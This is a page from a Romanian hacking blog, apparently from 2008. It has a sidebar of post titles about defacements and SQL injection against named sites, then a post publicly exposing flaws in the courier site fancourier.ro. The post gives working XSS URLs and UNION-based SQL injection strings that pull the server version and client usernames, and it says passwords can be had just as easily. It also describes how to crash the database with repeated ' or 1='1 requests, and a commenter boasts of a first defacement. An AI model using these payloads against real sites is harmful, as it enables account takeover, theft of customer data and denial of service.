- Hacker Uses XSS and Google Street View Data to Determine Physical Location
- CAnCAn te iubim, CA CA tine nu gasim. Superfete.cancan.ro e de rahat
- Deface (?!?) pe Cotidianul.ro
- Virusi in clipuri video [how to]
- Cyber-Bullying – palma parinteasca a noului mileniu
- Christopher “moot” Poole: The case for anonymity online
- Wtf Avira?
- Some old story about tagged.com
- Pwning cam girls for fun
- Tabloshit
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Hackersblog.org is now blog.rstcenter.com in (1771 Visits)
- O mica dar importanta precizare in (1371 Visits)
- Twitter in (806 Visits)
- This is the end in (777 Visits)
- Ce servicii de mail folositi? in (774 Visits)
- Un nou membru in (731 Visits)
- La multi ani România, la multi ani românilor in (719 Visits)
- Inca o pierdere de timp in (675 Visits)
- De reţinut in (634 Visits)
- Azi este ziua userilor hackersblog.org in (611 Visits)
- SMS scam (1) in (564 Visits)
- Dezinformare sau proasta informare? in (563 Visits)
- Hi5.com coders read this in (553 Visits)
- Phishing Raiffeisen cu atasament html in (517 Visits)
- Phishing Bancpost in (486 Visits)
- Si tentativele de phishing pot fi amuzante in (422 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (2708 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (2602 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (1144 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (1107 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (950 Visits)
- Virusi in clipuri video [how to] in (838 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (726 Visits)
- Yahoo! redirects - a big issue (with video) in (570 Visits)
- Internet vs. privacy (1) in (469 Visits)
- Ca musca in... in (435 Visits)
- RedTube.com ... The Free Sex Video Community in (12973 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (4921 Visits)
- libertatea.ro vulnerabil la (blind) sql injection in (2950 Visits)
- Pwning cam girls for fun in (2586 Visits)
- Telegraph.co.uk hacked, sql injection in (2547 Visits)
- Facebook hacked - sql injection in (2425 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (2407 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (1776 Visits)
- [Hacked]Bitdefender (Portugal) exposes sensitive customer data in (1744 Visits)
- Wtf Avira? in (1723 Visits)
- Christopher "moot" Poole: The case for anonymity online in (1495 Visits)
- Digital Photocopiers Loaded With Secrets in (1458 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (593 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (590 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (463 Visits)
- PRIVACY IS DEAD - GET OVER IT, Pt 01-34 (Recommended by Hackersblog ) in (396 Visits)
- Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (379 Visits)
- [Video] The History Of Hacking in (373 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (368 Visits)
- The Story of DEFCON in (343 Visits)
- Deface - tuttoaffari.lastampa.it si citymusiclab.city.corriere.it in (3493 Visits)
- RNS vs. RAI - citizenreport.rai.it hacked. in (3302 Visits)
- Hi5 email finder si sfarsitul a tot ceea ce inseamna privacy in social networking in (2996 Visits)
- Se poate sparge parola de Yahoo? in (2572 Visits)
- Free SMS time, TrimiteSMS.ro in (2492 Visits)
- Planete-plus-intelligente.lemonde.fr defaced by R.N.S. in (2464 Visits)
- Gmail uber hacking in (2257 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (2255 Visits)
- Cancan.ro spart pentru a doua oara intr-o zi in (2253 Visits)
- Stiri cu antena3 in (2208 Visits)
Posted on October 30th, 2008
In timp ce verificam ceva informatii despre o livrare pe care o asteptam cu nerabdare, am vazut ca siteul celor de la Fan Courier Express sta cam prost la partea de securitate a site-ului.
XSS-uri prin care se poate obtine acces in contul altui client (serviciul Client Tracking):
- http://www.fancourier.ro/comanda_online.php?xbutton=Go&xpas=1&xnume_expedit1=’%3E%3Cscript%3Ealert(/Tocsixu%20@%20hackersblog.org/)%3C/script%3E
- http://www.fancourier.ro/awb.php?xawb=1′%20–%20%3Cscript%3Ealert(/Tocsixu%20@%20hackersblog.org/)%3C/script%3E
SQL Injection in campurile AWB si Factura de la “Urmarire expeditie” si in form-ul de cautare oras in vederea obtinerii unor informatii legate de serverul SQL si totodata lista cu usere si parole a tuturor clientilor siteului:
lol' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT_WS(0x3C62723E,Version(),Database(),User()),13 FROM dual -- :


lol' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,username,13 FROM client LIMIT 1,1 -- : Listarea clientilor valabili pentru aplicatia Client Tracking… dupa cum vedem in imaginea de jos unul dintre usere e 1Iunie (aparent al firmei 1 IUNIE SA TIMISOARA). Parola userului se poate obtine la fel de usor. Dupa logare, se ajunge in panoul de client tracking


O alta problema cu care se confrunta site-ul poate permite oricarui utilizator sa blocheze accesul tuturor userilor la site “omorand” serverul SQL cu cateva query-uri (folosindu-se de SQL Injection) care il tin supraincarcat pana acesta cedeaza. Daca in casuta pentru AWB sau Factura in pagina “Urmarire Expeditie” se introduce o valoare de genul ' or 1='1 si se efectueaza ~15+ requesturi de genul (Apasarea consecutiva a butonului GO) se va intampla ce am spus adineauri:


October 31st, 2008 at 3:47 am
[...] fancourier.ro (FAN COURIER EXPRESS) XSS, SQL Injection, Self-DoS [...]
October 31st, 2008 at 11:10 am
Bă, deci daia nu puteam eu ieri să îmi vad coletu…
October 31st, 2008 at 1:24 pm
Salut. Ti-am vazut postat linkul pe rst. Acum cateva zile a avut loc primul meu deface, iar de atunci am stat cu burta pe fel de fel de site’uri, articole, tutoriale. Momentan mi-am downloadat un .pdf despre SQL , iar apoi incerc sa le citesc cateva tips’uri despre SQLi . As aprecia daca putem sa tinem legatura. Vreau sa invat
Ai mailul meu . Succes !